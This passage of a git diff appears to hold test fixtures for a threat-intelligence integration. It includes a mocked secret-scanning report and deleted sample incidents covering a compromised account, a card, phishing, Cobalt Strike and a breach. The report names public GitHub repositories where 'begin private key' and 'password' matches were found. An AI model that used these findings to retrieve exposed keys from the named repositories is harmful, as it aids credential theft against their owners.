+ "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "e5ed9c96940166a0f1a0f2d8c538bb0587e02bd7", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686423433 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-06-04T11:32:06+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8921da431bbc562961a131ab5958c1324caa906d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "6e75ac76542184f03b48d6ce9208913529a8d1e1", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685867526 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e2cd18c6ec790fd72d13b68ed3880a8480845cc", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": 
"1073384abb81cdbb0ea5a3be3ef1dba7bc4444b4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684792840 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-21T15:09:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7f03a2f14de1e70769b1f86e15cd7425514ccb66", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f82dec2051836821828ae7b84b99aa84aa4885c4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684670995 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7d51b93711e35b3ac97f4d483f87d4c8bbedb292", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "33cbe7fb2d127e8efd7dd98d808db8c223d89ec8", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684863717 + } + } + ], + "rules": null, + "url": 
"https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-24T18:03:58+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "c1b015cb6cdff6b28071e77e09e43bd87dbecd4f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "56101d6fa71af13ea5eef67f7cf0b088d6334e9d", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685026090 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "3352e1c8441c1eb0d2a6b9968575d4aab71e566e", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f4e19cdb63d2aa490e1c754d5d7bf4a640fa7599", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684940638 + } + } + ], + "rules": null, + "url": 
"https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-06-10T21:39:20+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "362cc87c04580fefb42e28c780b07b1d78ca9430", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "d5f9b30c3816d0af4f9f63b4260be814a9b27a68", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686439393 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-22T00:36:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b213f7127b8fbfe76e0cc076b4381618b9e6ef61", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "147e80f0c70f6cd4d923bfc09e3de7ea37f93601", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686179309 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-05T18:55:57+03:00", + "dateDetected": 
"2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "54a3d4900f0af60ee79d5939c4dfc2ff17b333a1", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "163839df539930714366aac403a8fc32f592c3ff", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1683302157 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "b7f7c981d54f93a58af9a9d6024f4907f1c49c6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/bartlomiejkrawczyk/PAINT-23L", + "numberOf": { + "contributors": 9, + "files": 10 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734317546081, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T14:58:22+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "9925f833b3b4ae766ebcd0d3e6d65f56f3a728f7", + "matchesType": [ + "readme" + 
], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "4e8bd797c4986e94a5d6a8ed296391b6c6d0e5cc", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751362 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2024-04-10T15:16:02+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "a1e944fbfd7ea5b6cc4445b36b7c20fcf04dbc21", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README_PL.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "7bb835f3c70c795af6b0905acac54df259363db9", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751372 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README_PL.md" + }, + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdf8fc37755c78a240b77641a97b61bd94b645e2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + 
"authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "026768532bcf4dd2d210a5a737ecd360836b94c2", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b912425818c603960dd60f29a9bcc84f5715b090", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": 
"2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "1d2eb46187084a1968523de96477b7fb7c6b8d86", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "748ba40c667039a0de88a0b38482265ad01c2a6f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + 
"dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "796973b223778cd4d5c07b4787d2ec00704fd325", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "e90f2df5fdb22056e360ee8c19335d90047498fa", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": 
"4256b013e8f6de1cd19a09cae9a90e7f0c92ccc9", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "a4fc7c10ad0a1ed8c44199ca8245e8aa080cc97f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "982e16c0481ef7b95ca105769c783336c99cdc6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/CrustyCracker/Wordle", + "numberOf": { + "contributors": 2, + "files": 11 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734319944338, + "source": "github" + } + ], + "seqUpdate": 1728734319944338 + } +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json
deleted file mode 100644
index 78fcc57c2c0a..000000000000
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json
+++ /dev/null
@@ -1,91 +0,0 @@ -{ - "compromised/account_group": [ - { - "last_fetch": { - "compromised/account": 1614919893874 - } - }, - [ - { - "name": "Compromised Account: some@gmail.com", - "occurred": "2022-10-20T18:12:28Z", - "rawJSON": "{\"dateFirstCompromised\": null, \"dateFirstSeen\": '\n '\"2022-10-20T18:12:28+00:00\", \"dateLastCompromised\": null, '\n '\"dateLastSeen\": \"2022-10-20T18:12:28+00:00\", \"displayOptions\": '\n '{\"favouriteForCompanies\": [], \"hideForCompanies\": [], '\n '\"isFavourite\": false, \"isHidden\": false}, \"evaluation\": '\n '{\"admiraltyCode\": \"A2\", \"credibility\": 80, \"reliability\": 100, '\n '\"severity\": \"red\", \"tlp\": \"red\", \"ttl\": 30}, \"eventCount\": 1, '\n '\"events\": [{\"client\": {\"ipv4\": {\"asn\": \"ASN\", \"city\": \"City\", '\n '\"countryCode\": \"Code\", \"countryName\": \"Country Name\", \"ip\": '\n '\"11.11.11.11\", \"provider\": \"provider\", \"region\": \"region\"}, '\n '\"ipv6\": null}, \"cnc\": {\"cnc\": \"https://some.ru\", \"domain\": '\n '\"some.ru\", \"ipv4\": {\"asn\": \"ASN\", \"city\": \"City\", '\n '\"countryCode\": \"Code\", \"countryName\": \"Country Name\", \"ip\": '\n '\"11.11.11.11\", \"provider\": \"provider\", \"region\": \"region\"}, '\n '\"ipv6\": null, \"url\": \"https://some.ru\"}, \"dateCompromised\": '\n 'null, \"dateDetected\": \"2022-10-20T18:12:28+00:00\", \"id\": '\n '\"1111111111111111111111111111111111111111\", \"malware\": '\n '{\"category\": [], \"class\": null, \"id\": '\n '\"1111111111111111111111111111111111111111\", \"name\": \"AZORult\", '\n '\"platform\": [], \"stixGuid\": '\n '\"1111111111111111111111111111111111111111\", \"threatLevel\": '\n 'null}, \"oldId\": \"11111111\", \"person\": null, \"source\": {\"id\": '\n '\"\", \"idType\": \"\", \"type\": \"Botnet\"}, \"stixGuid\": '\n '\"1111111111111111111111111111111111111111\", \"threatActor\": '\n 'null}], \"id\": \"1111111111111111111111111111111111111111\", '\n '\"login\": \"some@gmail.com\", \"malware\": 
[{\"category\": [], '\n '\"class\": null, \"id\": '\n '\"1111111111111111111111111111111111111111\", \"name\": \"Name\", '\n '\"platform\": [], \"stixGuid\": null, \"threatLevel\": null}], '\n '\"parsedLogin\": {\"domain\": \"some.com\", \"ip\": null}, \"password\": '\n '\"?\", \"port\": null, \"portalLink\": null, \"seqUpdate\": '\n '1670823245323, \"service\": {\"domain\": \"some.com\", \"host\": '\n '\"some.com\", \"ip\": null, \"url\": \"https://some.ru\"}, \"source\": '\n '[{\"id\": \"\", \"idType\": \"\", \"type\": \"Botnet\"}], \"sourceId\": [], '\n '\"sourceType\": [\"Botnet\"], \"threatActor\": [], \"name\": '\n '\"Compromised Account: some@gmail.com\", \"gibType\": '\n '\"compromised/account_group\", \"relatedIndicatorsData\": '\n '[[\"https://some.ru\"], [\"some.ru\"], [\"11.11.11.11\"], '\n '[\"11.11.11.11\"]], \"systemSeverity\": 3}'}])" - } - ] - ], - "compromised/card": [ - { - "last_fetch": { - "compromised/card": 1614923910464 - } - }, - [ - { - "name": "Compromised Card: 545123XXXXXXXXXX", - "occurred": "2019-12-12T10:57:49Z", - "rawJSON": "{\"baseName\": \"United States\", \"cardInfo\": {\"cvv\": null, \"dump\": null, \"issuer\": {\"countryCode\": \"US\", \"countryName\": \"UNITED STATES\", \"issuer\": \"SOME BANK\"}, \"number\": \"545123XXXXXXXXXX\", \"system\": \"VISA\", \"type\": \"CLASSIC\", \"validThru\": \"09/2025\"}, \"client\": {\"ipv4\": {\"asn\": null, \"city\": null, \"countryCode\": null, \"countryName\": null, \"ip\": null, \"provider\": null, \"region\": null}}, \"cnc\": {\"cnc\": \"mandarincc.pw\", \"domain\": \"mandarincc.pw\", \"ipv4\": {\"asn\": null, \"city\": \"San Francisco\", \"countryCode\": \"US\", \"countryName\": \"United States\", \"ip\": \"11.11.11.11\", \"provider\": \"Cloudflare\", \"region\": \"California\"}, \"ipv6\": null, \"url\": null}, \"dateCompromised\": \"2019-12-12T10:41:00+00:00\", \"dateDetected\": \"2019-12-12T10:57:49+00:00\", \"evaluation\": {\"admiraltyCode\": \"A2\", \"credibility\": 80, 
\"reliability\": 90, \"severity\": \"red\", \"tlp\": \"red\", \"ttl\": 90}, \"externalId\": \"12312\", \"id\": \"ecda6f4dc85596f447314ce01e2152db9c9d3cbc\", \"isFavourite\": false, \"isHidden\": false, \"malware\": {\"id\": \"53013c863116aae720581ff2aa2b4f92d3cb2bd7\", \"name\": \"mandarincc\"}, \"oldId\": \"396798216\", \"owner\": {\"address\": null, \"birthday\": null, \"city\": \"Something\", \"countryCode\": \"US\", \"email\": null, \"name\": \"Gary Oldman\", \"passport\": null, \"phone\": \"932876\", \"state\": \"Ohio\", \"taxNumber\": null, \"zip\": null}, \"portalLink\": \"https://bt.group-ib.com/cd/cards?searchValue=id:ecda6f4dc85596f447314ce01e2152db9c9d3cbc\", \"price\": {\"currency\": \"USD\", \"value\": \"13213\"}, \"seqUpdate\": 1614923910464, \"serviceCode\": null, \"sourceType\": \"Card shop\", \"threatActor\": {\"country\": null, \"id\": \"d7ff75c35f93dce6f5410bba9a6c206bdff66555\", \"isAPT\": false, \"name\": \"FRK48\"}, \"track\": [], \"name\": \"Compromised Card: 545123XXXXXXXXXX\", \"gibType\": \"compromised/card\", \"relatedIndicatorsData\": [\"mandarincc.pw\", \"11.11.11.11\"], \"systemSeverity\": 3}" - } - ] - ], - "bp/phishing": [ - { - "last_fetch": { - "bp/phishing": 1614925293641 - } - }, - [ - { - "name": "Phishing: some.ru", - "occurred": "2021-01-14T11:21:34Z", - "rawJSON": "{\"dateBlocked\": null, \"dateDetected\": \"2021-01-14T11:21:34+00:00\", \"evaluation\": {\"admiraltyCode\": \"A2\", \"credibility\": 80, \"reliability\": 90, \"severity\": \"red\", \"tlp\": \"amber\", \"ttl\": 30}, \"history\": [{\"date\": \"2021-01-13T11:20:50+00:00\", \"field\": \"Detected\", \"reason\": \"In response\", \"reporter\": \"Group-IB Intelligence\", \"value\": \"In response\"}, {\"date\": \"2021-01-14T11:20:50+00:00\", \"field\": \"Status has been changed\", \"reason\": \"-\", \"reporter\": \"Group-IB Intelligence\", \"value\": \"In response\"}], \"id\": \"fce7f92d0b64946cf890842d083953649b259952\", \"ipv4\": {\"asn\": null, \"city\": \"Some city\", 
\"countryCode\": \"CA\", \"countryName\": \"Canada\", \"ip\": \"11.11.11.11\", \"provider\": \"Some provider\", \"region\": \"NA\"}, \"isFavourite\": false, \"isHidden\": false, \"oldId\": \"396798526\", \"phishingDomain\": {\"domain\": \"some.ru\", \"local\": \"some.ru\", \"dateRegistered\": \"2013-11-15 13:41:30\", \"title\": \"\", \"registrar\": \"Some\"}, \"portalLink\": \"https://bt.group-ib.com/attacks/phishing?searchValue=id:fce7f92d0b64946cf890842d083953649b259952\", \"seqUpdate\": 1614925293641, \"status\": \"In response\", \"targetBrand\": \"Some brand\", \"targetCategory\": \"Finance > Banking\", \"targetCountryName\": null, \"targetDomain\": \"some.ru\", \"type\": \"Phishing\", \"url\": \"https://some.ru\", \"name\": \"Phishing: some.ru\", \"gibType\": \"bp/phishing\", \"relatedIndicatorsData\": [\"https://some.ru\", \"some.ru\", \"11.11.11.11\"], \"systemSeverity\": 3}" - } - ] - ], - "malware/targeted_malware": [ - { - "last_fetch": { - "malware/targeted_malware": 1614920439682 - } - }, - [ - { - "name": "Targeted Malware: 971cca2a0f04ced4crb8218624d88de2", - "occurred": "2021-01-21T06:49:12Z", - "rawJSON": "{\"date\": \"2021-01-21T06:49:12+00:00\", \"dateAnalyzeEnded\": \"2021-01-21T09:53:23+00:00\", \"dateAnalyzeStarted\": \"2021-01-21T09:49:12+00:00\", \"evaluation\": {\"admiraltyCode\": \"A1\", \"credibility\": 100, \"reliability\": 100, \"severity\": \"red\", \"tlp\": \"red\", \"ttl\": null}, \"fileName\": \"some.txt\", \"fileType\": \"data\", \"fileVersion\": null, \"hasReport\": true, \"id\": \"5bbd38acf0b9e4f04123af494d485f6c49221e98\", \"injectDump\": \"saasadasdd\", \"injectMd5\": \"971cca2a0f04ced4crb8218624d88de2\", \"isFavourite\": false, \"isHidden\": false, \"malware\": {\"id\": \"b69fc9d439d2fd41e98a7e3c60b9a55340012eb6\", \"name\": \"Cobalt Strike\"}, \"md5\": \"11702f92313f5f5123d129809ca4f83d\", \"oldId\": \"396793259\", \"portalLink\": \"https://bt.group-ib.com/targeted_malware/Cobalt 
Strike/sample/5bbd38acf0b9e4f04123af494d485f6c49221e98/show\", \"seqUpdate\": 1614920439682, \"sha1\": \"93fce6228be5557c69d8eeaab5a5a2a643e7d450\", \"sha256\": \"630c88ca1d583f05283707730da5b1f4423807cd80cab108821157ad341b5003\", \"size\": 208178, \"source\": \"Sandbox service\", \"threatActor\": {\"country\": null, \"id\": \"d7ff75c35f93dce6f5410bba9a6c206bdff66555\", \"isAPT\": false, \"name\": \"FRK48\"}, \"name\": \"Targeted Malware: 971cca2a0f04ced4crb8218624d88de2\", \"gibType\": \"malware/targeted_malware\", \"relatedIndicatorsData\": [\"11702f92313f5f5123d129809ca4f83d\"], \"systemSeverity\": 3}" - } - ] - ], - "compromised/breached": [ - { - "last_fetch": { - "compromised/breached": { - "starting_date_from": "2020-01-01", - "page": 0, - "starting_date_to": "2021-01-01", - "current_date_to": "2021-01-01" - } - } - }, - [ - { - "name": "Data Breach: some@gmail.com", - "occurred": "2021-06-12T03:02:00Z", - "rawJSON": "{\"addInfo\": {\"address\": [\"\"]}, \"email\": [\"some@gmail.com\"], \"id\": [\"277c4112d348c91f6dabe9467f0d11dd\"], \"leakName\": \"some.com\", \"password\": 